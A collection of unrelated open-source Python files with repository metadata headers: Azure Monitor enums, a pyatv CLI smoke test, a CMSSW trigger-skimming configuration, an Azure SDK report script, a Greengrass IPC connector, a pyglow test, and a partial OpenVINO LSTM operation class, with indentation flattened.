M_D_YYYY_HH_MM_SS_AM_PM = "M/D/YYYY HH:MM:SS AM/PM"
MON_DD_YYYY_HH_MM_SS = "Mon DD, YYYY HH:MM:SS"
YY_M_MDD_HH_MM_SS = "yyMMdd HH:mm:ss"
DD_M_MYY_HH_MM_SS = "ddMMyy HH:mm:ss"
MMM_D_HH_MM_SS = "MMM d hh:mm:ss"
DD_MMM_YYYY_HH_MM_SS_ZZZ = "dd/MMM/yyyy:HH:mm:ss zzz"
YYYY_MM_DD_THH_MM_SS_K = "yyyy-MM-ddTHH:mm:ssK"
class KnownPerfCounterDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_PERF = "Microsoft-Perf"
MICROSOFT_INSIGHTS_METRICS = "Microsoft-InsightsMetrics"
class KnownPublicNetworkAccessOptions(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The configuration to set whether network access from public internet to the endpoints are
allowed.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class KnownSyslogDataSourceFacilityNames(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
AUTH = "auth"
AUTHPRIV = "authpriv"
CRON = "cron"
DAEMON = "daemon"
KERN = "kern"
LPR = "lpr"
MAIL = "mail"
MARK = "mark"
NEWS = "news"
SYSLOG = "syslog"
USER = "user"
UUCP = "uucp"
LOCAL0 = "local0"
LOCAL1 = "local1"
LOCAL2 = "local2"
LOCAL3 = "local3"
LOCAL4 = "local4"
LOCAL5 = "local5"
LOCAL6 = "local6"
LOCAL7 = "local7"
ASTERISK = "*"
class KnownSyslogDataSourceLogLevels(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
DEBUG = "Debug"
INFO = "Info"
NOTICE = "Notice"
WARNING = "Warning"
ERROR = "Error"
CRITICAL = "Critical"
ALERT = "Alert"
EMERGENCY = "Emergency"
ASTERISK = "*"
class KnownSyslogDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_SYSLOG = "Microsoft-Syslog"
class KnownWindowsEventLogDataSourceStreams(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MICROSOFT_WINDOWS_EVENT = "Microsoft-WindowsEvent"
MICROSOFT_EVENT = "Microsoft-Event"
path: /tests/scripts/test_atvremote.py | repo: postlund/pyatv | license: MIT (permissive) | language: Python | encoding: UTF-8 | size: 3,391 bytes
"""Smoke test for atvremote."""
from pyatv.auth.hap_pairing import parse_credentials
from pyatv.auth.server_auth import CLIENT_CREDENTIALS
from pyatv.const import Protocol
from tests.fake_device.airplay import DEVICE_CREDENTIALS, DEVICE_PIN
from tests.scripts.script_env import AIRPLAY_ID, DMAP_ID, IP_1, IP_2, MRP_ID, ScriptTest
class AtvremoteTest(ScriptTest):
async def atvremote(self, *args):
return await self.run_script("atvremote", *args)
async def test_scan_devices(self):
await self.atvremote("scan")
self.has_output(
"Apple TV 1", "Apple TV 2", IP_1, IP_2, MRP_ID, AIRPLAY_ID, DMAP_ID
)
self.exit(0)
async def test_scan_hosts(self):
await self.atvremote("--scan-hosts", "127.0.0.1", "scan")
self.has_output("Apple TV 2", IP_2, MRP_ID, AIRPLAY_ID)
self.exit(0)
async def test_scan_single_identifier(self):
await self.atvremote("--id", MRP_ID, "scan")
self.has_output("Apple TV 2", IP_2, MRP_ID, AIRPLAY_ID)
self.exit(0)
async def test_scan_multiple_identifier(self):
await self.atvremote("--id", f"bad_id,{DMAP_ID}", "scan")
self.has_output(
"Apple TV 1",
IP_1,
DMAP_ID,
)
self.exit(0)
async def test_pair_airplay(self):
self.user_input(str(DEVICE_PIN))
await self.atvremote(
"--address",
IP_2,
"--protocol",
"airplay",
"--id",
MRP_ID,
"pair",
)
self.has_output(
"Enter PIN",
"seems to have succeeded",
parse_credentials(DEVICE_CREDENTIALS),
)
self.exit(0)
async def test_airplay_play_url(self):
self.user_input(str(DEVICE_PIN))
await self.atvremote(
"--id",
MRP_ID,
"--airplay-credentials",
DEVICE_CREDENTIALS,
"play_url=http://fake",
)
self.exit(0)
async def test_mrp_idle(self):
await self.atvremote("--id", MRP_ID, "playing")
self.has_output("Media type: Unknown", "Device state: Idle")
self.exit(0)
async def test_device_info(self):
await self.atvremote("--id", MRP_ID, "device_info")
self.has_output("tvOS", AIRPLAY_ID)
self.exit(0)
async def test_mrp_auth(self):
await self.atvremote(
"--id", MRP_ID, "--mrp-credentials", CLIENT_CREDENTIALS, "playing"
)
self.assertTrue(self.state.has_authenticated)
self.has_output("Device state: Idle")
self.exit(0)
async def test_mrp_auth_error(self):
await self.atvremote(
"--id", MRP_ID, "--mrp-credentials", "30:31:32:33", "playing"
)
self.assertFalse(self.state.has_authenticated)
self.has_error("AuthenticationError")
self.exit(1)
async def test_manual_connect(self):
self.user_input(str(DEVICE_PIN))
await self.atvremote(
"--address",
IP_2,
"--protocol",
"mrp",
"--port",
str(self.fake_atv.get_port(Protocol.MRP)),
"--id",
MRP_ID,
"--manual",
"playing",
)
self.has_output("Media type: Unknown", "Device state: Idle")
self.exit(0)
path: /Configuration/Skimming/test/SDmaker_6SD_3CS_PDMinBias_1e28_cfg.py | repo: cms-sw/cmssw | license: Apache-2.0 (permissive) | language: Python | encoding: UTF-8 | size: 16,026 bytes
import FWCore.ParameterSet.Config as cms
process = cms.Process("makeSD")
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.2 $'),
annotation = cms.untracked.string('SD and central skims'),
name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/Skimming/test/SDmaker_6SD_3CS_PDMinBias_1e28_cfg.py,v $')
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
process.load("Configuration.StandardSequences.MagneticField_38T_cff")
process.load("Configuration.StandardSequences.GeometryExtended_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load('Configuration.EventContent.EventContent_cff')
process.GlobalTag.globaltag = "GR_R_36X_V11A::All"
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/data/Commissioning10/MinimumBias/RAW-RECO/v8/000/132/601/F85204EE-EB40-DF11-8F71-001A64789D1C.root'
),
secondaryFileNames = cms.untracked.vstring(
'/store/data/Commissioning09/Cosmics/RAW/v3/000/105/755/F6887FD0-9371-DE11-B69E-00304879FBB2.root'
)
)
process.source.inputCommands = cms.untracked.vstring("keep *", "drop *_MEtoEDMConverter_*_*")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 100
import HLTrigger.HLTfilters.hltHighLevelDev_cfi
### JetMETTau SD
process.JetMETTau_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.JetMETTau_1e28.HLTPaths = (
"HLT_Jet15U",
"HLT_DiJetAve15U_8E29",
"HLT_FwdJet20U",
"HLT_Jet30U",
"HLT_Jet50U",
"HLT_DiJetAve30U_8E29",
"HLT_QuadJet15U",
"HLT_MET45",
"HLT_MET100",
"HLT_HT100U",
"HLT_SingleLooseIsoTau20",
"HLT_DoubleLooseIsoTau15",
"HLT_DoubleJet15U_ForwardBackward",
"HLT_BTagMu_Jet10U",
"HLT_BTagIP_Jet50U",
"HLT_StoppedHSCP_8E29"
)
process.JetMETTau_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
process.JetMETTau_1e28.HLTOverallPrescale = cms.uint32(1)
process.JetMETTau_1e28.throw = False
process.JetMETTau_1e28.andOr = True
process.filterSdJetMETTau_1e28 = cms.Path(process.JetMETTau_1e28)
### JetMETTauMonitor SD
process.JetMETTauMonitor_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.JetMETTauMonitor_1e28.HLTPaths = (
"HLT_L1Jet6U",
"HLT_L1MET20",
"HLT_L1SingleCenJet",
"HLT_L1SingleForJet",
"HLT_L1SingleTauJet",
"HLT_L1Jet10U",
"HLT_L1Jet10U_NoBPTX",
"HLT_L1Jet6U_NoBPTX",
"HLT_L1SingleCenJet_NoBPTX",
"HLT_L1SingleForJet_NoBPTX",
"HLT_L1SingleTauJet_NoBPTX"
)
process.JetMETTauMonitor_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1)
process.JetMETTauMonitor_1e28.HLTOverallPrescale = cms.uint32(1)
process.JetMETTauMonitor_1e28.throw = False
process.JetMETTauMonitor_1e28.andOr = True
process.filterSdJetMETTauMonitor_1e28 = cms.Path(process.JetMETTauMonitor_1e28)
### MuMonitor SD
process.MuMonitor_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.MuMonitor_1e28.HLTPaths = (
"HLT_L1MuOpen",
"HLT_L1Mu"
)
process.MuMonitor_1e28.HLTPathsPrescales = cms.vuint32(1,1)
process.MuMonitor_1e28.HLTOverallPrescale = cms.uint32(1)
process.MuMonitor_1e28.throw = False
process.MuMonitor_1e28.andOr = True
process.filterSdMuMonitor_1e28 = cms.Path(process.MuMonitor_1e28)
### Mu SD
process.Mu_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.Mu_1e28.HLTPaths = (
"HLT_L2Mu0",
"HLT_L2Mu3",
#"HLT_L2Mu5",
"HLT_L1Mu20",
"HLT_L2Mu9",
"HLT_L2Mu11",
"HLT_L1Mu14_L1SingleEG10",
"HLT_L1Mu14_L1SingleJet6U",
"HLT_L1Mu14_L1ETM30",
"HLT_L2DoubleMu0",
"HLT_L1DoubleMuOpen",
"HLT_DoubleMu0",
"HLT_DoubleMu3",
"HLT_Mu3",
"HLT_Mu5",
"HLT_Mu9",
"HLT_IsoMu3",
"HLT_Mu0_L1MuOpen",
"HLT_Mu0_Track0_Jpsi",
"HLT_Mu3_L1MuOpen",
"HLT_Mu3_Track0_Jpsi",
"HLT_Mu5_L1MuOpen",
"HLT_Mu5_Track0_Jpsi",
"HLT_Mu0_L2Mu0",
"HLT_Mu3_L2Mu0",
"HLT_Mu5_L2Mu0"
)
process.Mu_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
process.Mu_1e28.HLTOverallPrescale = cms.uint32(1)
process.Mu_1e28.throw = False
process.Mu_1e28.andOr = True
process.filterSdMu_1e28 = cms.Path(process.Mu_1e28)
### EGMonitor SD
process.EGMonitor_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.EGMonitor_1e28.HLTPaths = (
"HLT_L1SingleEG2",
"HLT_L1SingleEG5",
"HLT_L1SingleEG8",
"HLT_L1DoubleEG5",
"HLT_EgammaSuperClusterOnly_L1R",
"HLT_L1SingleEG20_NoBPTX",
"HLT_L1SingleEG2_NoBPTX",
"HLT_L1SingleEG5_NoBPTX"
)
process.EGMonitor_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1)
process.EGMonitor_1e28.HLTOverallPrescale = cms.uint32(1)
process.EGMonitor_1e28.throw = False
process.EGMonitor_1e28.andOr = True
process.filterSdEGMonitor_1e28 = cms.Path(process.EGMonitor_1e28)
### EG SD
process.EG_1e28 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.EG_1e28.HLTPaths = (
"HLT_Photon10_L1R",
"HLT_Photon15_L1R",
"HLT_Photon15_LooseEcalIso_L1R",
"HLT_Photon20_L1R",
"HLT_Photon30_L1R_8E29",
"HLT_DoublePhoton4_Jpsi_L1R",
"HLT_DoublePhoton4_Upsilon_L1R",
"HLT_DoublePhoton4_eeRes_L1R",
"HLT_DoublePhoton5_eeRes_L1R", #added to match the /cdaq/physics/firstCollisions10/v2.0/HLT_7TeV/V5 table
"HLT_DoublePhoton5_Jpsi_L1R",
"HLT_DoublePhoton5_Upsilon_L1R",
"HLT_DoublePhoton5_L1R",
"HLT_DoublePhoton10_L1R",
"HLT_DoubleEle5_SW_L1R",
"HLT_Ele20_LW_L1R",
"HLT_Ele15_SiStrip_L1R",
"HLT_Ele15_SC10_LW_L1R",
"HLT_Ele15_LW_L1R",
"HLT_Ele10_LW_EleId_L1R",
"HLT_Ele10_LW_L1R",
"HLT_Photon15_TrackIso_L1R"
)
process.EG_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
process.EG_1e28.HLTOverallPrescale = cms.uint32(1)
process.EG_1e28.throw = False
process.EG_1e28.andOr = True
process.filterSdEG_1e28 = cms.Path(process.EG_1e28)
### JetMET AOD CS
process.DiJetAve_1e29 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.DiJetAve_1e29.HLTPaths = ("HLT_DiJetAve15U_8E29","HLT_DiJetAve30U_8E29")
process.DiJetAve_1e29.HLTPathsPrescales = cms.vuint32(1,1)
process.DiJetAve_1e29.HLTOverallPrescale = cms.uint32(1)
process.DiJetAve_1e29.andOr = True
process.filterCsDiJetAve_1e29 = cms.Path(process.DiJetAve_1e29)
### Onia skim CS
process.goodMuons = cms.EDFilter("MuonRefSelector",
src = cms.InputTag("muons"),
cut = cms.string("isGlobalMuon || (isTrackerMuon && numberOfMatches('SegmentAndTrackArbitration')>0)"),
)
process.diMuons = cms.EDProducer("CandViewShallowCloneCombiner",
decay = cms.string("goodMuons goodMuons"),
checkCharge = cms.bool(False),
cut = cms.string("mass > 2"),
)
process.diMuonFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("diMuons"),
minNumber = cms.uint32(1),
)
process.Skim_diMuons = cms.Path(
process.goodMuons *
process.diMuons *
process.diMuonFilter
)
### Tau skim CS
process.load("CondCore.DBCommon.CondDBSetup_cfi")
process.load("TrackingTools/TransientTrack/TransientTrackBuilder_cfi")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff")
process.load("HLTrigger/HLTfilters/hltLevel1GTSeed_cfi")
process.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)
process.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('(0 AND (40 OR 41) AND NOT (36 OR 37 OR 38 OR 39))')
process.scrapping = cms.EDFilter("FilterOutScraping",
applyfilter = cms.untracked.bool(True),
debugOn = cms.untracked.bool(False),
numtrack = cms.untracked.uint32(10),
thresh = cms.untracked.double(0.25)
)
process.PFTausSelected = cms.EDFilter("PFTauSelector",
src = cms.InputTag("shrinkingConePFTauProducer"),
discriminators = cms.VPSet(
cms.PSet( discriminator=cms.InputTag("shrinkingConePFTauDiscriminationByIsolation"),
selectionCut=cms.double(0.5)
),
),
cut = cms.string('et > 15. && abs(eta) < 2.5')
)
process.PFTauSkimmed = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag('PFTausSelected'),
minNumber = cms.uint32(1)
)
process.tauFilter = cms.Path(
process.hltLevel1GTSeed *
process.scrapping *
process.PFTausSelected *
process.PFTauSkimmed
)
process.outputSdJetMETTau = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdJetMETTau_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_JetMETTau')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_JetMETTau_1e28.root')
)
process.outputSdJetMETTauMonitor = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdJetMETTauMonitor_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_JetMETTauMonitor')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_JetMETTauMonitor_1e28.root')
)
process.outputSdMuMonitor = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdMuMonitor_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_MuMonitor')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_MuMonitor_1e28.root')
)
process.outputSdMu = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdMu_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_Mu')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_Mu_1e28.root')
)
process.outputSdEGMonitor = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdEGMonitor_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_EGMonitor')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_EGMonitor_1e28.root')
)
process.outputSdEG = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdEG_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_EG')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_EG_1e28.root')
)
process.outputCsDiJet = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('USER'),
filterName = cms.untracked.string('CS_DiJetAve')),
outputCommands = cms.untracked.vstring(
'drop *',
#------- CaloJet collections ------
'keep recoCaloJets_kt4CaloJets_*_*',
'keep recoCaloJets_kt6CaloJets_*_*',
'keep recoCaloJets_ak5CaloJets_*_*',
'keep recoCaloJets_ak7CaloJets_*_*',
'keep recoCaloJets_iterativeCone5CaloJets_*_*',
#------- CaloJet ID ---------------
'keep *_kt4JetID_*_*',
'keep *_kt6JetID_*_*',
'keep *_ak5JetID_*_*',
'keep *_ak7JetID_*_*',
'keep *_ic5JetID_*_*',
#------- PFJet collections ------
'keep recoPFJets_kt4PFJets_*_*',
'keep recoPFJets_kt6PFJets_*_*',
'keep recoPFJets_ak5PFJets_*_*',
'keep recoPFJets_ak7PFJets_*_*',
'keep recoPFJets_iterativeCone5PFJets_*_*',
#------- JPTJet collections ------
'keep *_JetPlusTrackZSPCorJetAntiKt5_*_*',
#'keep *_ak4JPTJets_*_*',
#'keep *_iterativeCone5JPTJets_*_*',
#------- Trigger collections ------
'keep edmTriggerResults_TriggerResults_*_*',
'keep *_hltTriggerSummaryAOD_*_*',
'keep L1GlobalTriggerObjectMapRecord_*_*_*',
'keep L1GlobalTriggerReadoutRecord_*_*_*',
#------- Tracks collection --------
'keep recoTracks_generalTracks_*_*',
#------- CaloTower collection -----
'keep *_towerMaker_*_*',
#------- Various collections ------
'keep *_EventAuxilary_*_*',
'keep *_offlinePrimaryVertices_*_*',
'keep *_hcalnoise_*_*',
#------- MET collections ----------
'keep *_metHO_*_*',
'keep *_metNoHF_*_*',
'keep *_metNoHFHO_*_*',
'keep *_met_*_*'),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterCsDiJetAve_1e29')),
fileName = cms.untracked.string('CS_JetAOD_DiJetAve_1e28.root')
)
process.outputCsOnia = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('CS_Onia')),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('Skim_diMuons')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('CS_Onia_1e28.root')
)
process.outputCsTau = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RAW-RECO'),
filterName = cms.untracked.string('CS_Tau')),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('tauFilter')),
outputCommands = process.FEVTEventContent.outputCommands,
fileName = cms.untracked.string('CS_Tau_1e28.root')
)
process.this_is_the_end = cms.EndPath(
process.outputSdJetMETTau +
process.outputSdJetMETTauMonitor +
process.outputSdMuMonitor +
process.outputSdMu +
process.outputSdEGMonitor +
process.outputSdEG +
process.outputCsDiJet +
process.outputCsOnia +
process.outputCsTau
)
path: /eng/scripts/python_sdk_report.py | repo: Azure/azure-sdk-tools | licenses: MIT, LicenseRef-scancode-generic-cla (permissive) | language: Python | encoding: UTF-8 | size: 2,472 bytes
#!/usr/bin/python3
"""
python_sdk_report.py
Generate APIView for all SDKs in the azure-sdk-for-python repo and report on any failures.
"""
import glob
import json
import os
import re
import sys
from typing import Optional
from apistub import StubGenerator
ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
PACKAGE_NAME_RE = re.compile(r"sdk\\([a-z]+)\\([a-z\-]+)\\setup.py")
SKIP_PACKAGES = [
"core:azure",
"core:azure-mgmt",
"monitor:azure-monitor",
"storage:azure-storage"
]
class _Result:
def __init__(self, *, service_dir: str, package_name: str, success: bool, error: Optional[str]):
self.service_dir = service_dir
self.package_name = package_name
self.success = success
self.error = error
if __name__ == '__main__':
warning_color = '\033[91m'
end_color = '\033[0m'
stub_gen_path = os.path.join(ROOT, 'packages', 'python-packages', 'apiview-stub-generator')
changelog_path = os.path.join(stub_gen_path, "CHANGELOG.md")
version_path = os.path.join(stub_gen_path, 'apistub', '_version.py')
args = sys.argv
if len(args) != 2:
print("usage: python python_sdk_report.py <PYTHON SDK REPO ROOT>")
sys.exit(1)
python_sdk_root = args[1]
print(f"Python SDK Root: {python_sdk_root}")
results = {}
for path in glob.glob(os.path.join(python_sdk_root, "sdk", "**", "**", "setup.py")):
package_path = os.path.split(path)[0]
try:
(service_dir, package_name) = PACKAGE_NAME_RE.findall(path)[0]
except IndexError:  # path does not match the expected sdk\<service>\<package>\setup.py layout
print(f"Couldn't parse: {path}")
continue
if f"{service_dir}:{package_name}" in SKIP_PACKAGES:
continue
print(f"Parsing {service_dir}/{package_name}...")
if service_dir not in results:
results[service_dir] = []
try:
_ = StubGenerator(pkg_path=package_path, skip_pylint=True).generate_tokens()
success = True
error = None
except Exception as err:
success = False
error = str(err)
results[service_dir].append(_Result(
service_dir=service_dir,
package_name=package_name,
success=success,
error=error
))
filename = "stubgen_report.json"
print(f"Saving results to {filename}...")
with open(filename, "w") as outfile:
# _Result instances are not JSON-serializable by default, so dump their __dict__
outfile.write(json.dumps(results, indent=4, default=vars))
path: /code/recursion.py | repo: BYRIO/BUPTBachelorThesis | license: MIT (permissive) | language: Python | encoding: UTF-8 | size: 68 bytes
def numbers(x):
if x > 0:
print(x)
numbers(x-1)
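# Illustrative sketch (not in the original file): numbers(3) prints 3, 2 and 1, one per
# line, because the recursion stops once x reaches 0.
if __name__ == "__main__":
    numbers(3)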
path: /awsiot/greengrasscoreipc/__init__.py | repo: aws/aws-iot-device-sdk-python-v2 | license: Apache-2.0 (permissive) | language: Python | encoding: UTF-8 | size: 2,337 bytes
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import os
from typing import Optional
from awscrt.io import (
ClientBootstrap,
DefaultHostResolver,
EventLoopGroup,
SocketDomain,
SocketOptions,
)
from awsiot.eventstreamrpc import (
Connection,
LifecycleHandler,
MessageAmendment,
)
from awsiot.greengrasscoreipc.client import GreengrassCoreIPCClient
def connect(*,
ipc_socket: str=None,
authtoken: str=None,
lifecycle_handler: Optional[LifecycleHandler]=None,
timeout: float=10.0) -> GreengrassCoreIPCClient:
"""
Creates an IPC client and connects to the GreengrassCoreIPC service.
Args:
ipc_socket: Path to the Unix domain socket of Greengrass Nucleus, defaults to
environment variable AWS_GG_NUCLEUS_DOMAIN_SOCKET_FILEPATH_FOR_COMPONENT
authtoken: Authentication token, defaults to environment variable SVCUID
lifecycle_handler: Handler for events over the course of this
network connection. See :class:`awsiot.eventstreamrpc.LifecycleHandler` for more info.
Handler methods will only be invoked if the connect attempt
succeeds.
timeout: The number of seconds to wait for establishing the connection.
Returns:
Client for the GreengrassCoreIPC service.
"""
if not ipc_socket:
ipc_socket = os.environ["AWS_GG_NUCLEUS_DOMAIN_SOCKET_FILEPATH_FOR_COMPONENT"]
if not authtoken:
authtoken = os.environ["SVCUID"]
if not lifecycle_handler:
lifecycle_handler = LifecycleHandler()
elg = EventLoopGroup(num_threads=1)
resolver = DefaultHostResolver(elg)
bootstrap = ClientBootstrap(elg, resolver)
socket_options = SocketOptions()
socket_options.domain = SocketDomain.Local
amender = MessageAmendment.create_static_authtoken_amender(authtoken)
connection = Connection(
host_name=ipc_socket,
port=0, # dummy port number, not needed for Unix domain sockets
bootstrap=bootstrap,
socket_options=socket_options,
connect_message_amender=amender,
)
connect_future = connection.connect(lifecycle_handler)
connect_future.result(timeout)
return GreengrassCoreIPCClient(connection)
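# Illustrative usage sketch (not part of the SDK module): inside a Greengrass component
# the Nucleus provides AWS_GG_NUCLEUS_DOMAIN_SOCKET_FILEPATH_FOR_COMPONENT and SVCUID,
# so a bare connect() is usually enough.
def _example_connect() -> GreengrassCoreIPCClient:
    return connect(timeout=10.0)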
path: /test/test_indices.py | repo: timduly4/pyglow | license: MIT (permissive) | language: Python | encoding: UTF-8 | size: 814 bytes
from datetime import datetime
import math
import unittest
from src.pyglow import Indice
from src.pyglow.constants import DIR_FILE as pyglow_file
print("pyglow file: {}".format(pyglow_file))
class TestIndice(unittest.TestCase):
def setUp(self):
# Instantiate indice data structure:
dn = datetime(2010, 3, 23, 15, 30)
self.indice = Indice(dn)
def tearDown(self):
pass
def test_run(self):
""" Retrieval of geophysical indices """
self.indice.run()
self.assertFalse(math.isnan(self.indice.f107))
def test_all_nan(self):
# Nominal case:
self.indice.run()
self.assertFalse(self.indice.all_nan())
def test_all_nan_not_run(self):
# Not running indices:
self.assertTrue(self.indice.all_nan())
path: /tools/mo/openvino/tools/mo/ops/lstm_sequence.py | repo: openvinotoolkit/openvino | license: Apache-2.0 (permissive) | language: Python | encoding: UTF-8 | size: 6,465 bytes
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
from openvino.tools.mo.front.common.partial_infer.utils import mark_input_bins, shape_array, shape_insert
from openvino.tools.mo.front.common.partial_infer.utils import int64_array
from openvino.tools.mo.graph.graph import Node, add_opoutput, Graph
from openvino.tools.mo.ops.op import Op
class LSTMSequence(Op):
""" Implements a layer that incorporates LSTM cell in a loop like it is specified in ONNX
It is assumed that there is no equivalent of this op in IE,
so it is considered as intermediate operation that will be translated differently.
We define type for this operation to enable debuggin at IE side.
There are several flavors of this op depending on how it was created and in which framework.
There are several attributes that specifies the LSTM flavor:
- ONNX/LSTM gives this op in non-normalized form and will require normalization
as a separate transformation (see LSTMSequenceNormalize middle transformation);
in this case blobs_wrb=True. Normalized weights/biases for MatMul is used when
blobs_wrb=True.
- ONNX/LSTM defines output shape as 4D: [seq_length, num_directions, batch_size,
hidden_size], where num_directions = 1 is supported only. In this case
has_num_directions=True. Otherwise, output is 3D and doesn't contain num_directions.
- Depending on the original framework, the `format` attribute is specified accordingly.
Its value controls which normalization transformations are called.
"""
op = 'LSTMSequence'
def __init__(self, graph: Graph, attrs: dict):
mandatory_props = {
'type': None, # should be never emitted to IR; for debugging purposes
'op': self.op,
'blobs_wrb': False,
'has_num_directions': False,
'direction': 'forward',
'num_layers': 1,
'infer': self.infer,
'blob_bidirectional_split': lambda node: (
LSTMSequence.split_helper(node, 0, 'forward'),
LSTMSequence.split_helper(node, 1, 'reverse')
)
}
super().__init__(graph, mandatory_props, attrs)
def supported_attrs(self):
return [
'hidden_size', # number of the elements in hidden cell size
'direction', # one of 'forward', 'reverse', or 'bidirectional'
'batch_dim', # batch dimension index in input/output shape
'sequence_dim', # sequence dimension index in input shape
'blobs_wrb', # input blobs have three separate components W, R and B like in ONNX/LSTM
'has_num_directions', # if True, output shape has 4 dimensions; 3D otherwise
'format', # format type of input blobs for different frameworks (onnx, tf, mxnet)
]
def backend_attrs(self):
return [
'hidden_size',
('activations', lambda node: ','.join(node['activations']) if node.has_and_set('activations') else None),
('activations_alpha', lambda node: ','.join(map(str, node['activations_alpha']))
if node.has_and_set('activations_alpha') else None),
('activations_beta', lambda node: ','.join(map(str, node['activations_beta']))
if node.has_and_set('activations_beta') else None),
'clip',
'direction',
]
@staticmethod
def split_helper(node, index: int, direction: str):
return Op._create_data_node(
node.graph,
name=node.name + '/SplittedBiLSTM/{}/'.format(direction),
attrs={'value': node.value[index], 'shape': int64_array(node.value[index].shape)}
)
@staticmethod
def infer(node: Node):
# there are limitations coming from ONNX LSTM definition and normalization rules
assert len(node.in_nodes()) >= 3 # X, W and R
assert len(node.in_nodes()) <= 7
assert len(node.out_nodes()) <= 3
assert node.batch_dim <= 1
assert node.sequence_dim <= 1
assert node.batch_dim != node.sequence_dim
assert node.direction in ['forward', 'reverse', 'bidirectional']
if node.blobs_wrb:
mark_input_bins(node, ['W', 'R', 'B'])
else:
mark_input_bins(node)
input_shape = node.in_node(0).shape
assert len(input_shape) == 3
for port in [2, 3]:
if port in node.in_nodes() and len(node.in_node(port).in_nodes()) > 0 and \
'zero_shapes' in node.in_node(port).in_node():
for i in node.in_node(port).in_node().zero_shapes:
if node.in_node(port).shape[i] != input_shape[i]:
node.in_node(port).value = np.repeat(node.in_node(port).value, input_shape[i], axis=i)
node.in_node(port).shape[i] = input_shape[i]
out_shape = shape_array([input_shape[node.sequence_dim], input_shape[node.batch_dim], node.hidden_size])
assert not node.has_num_directions or node.sequence_dim == 0, \
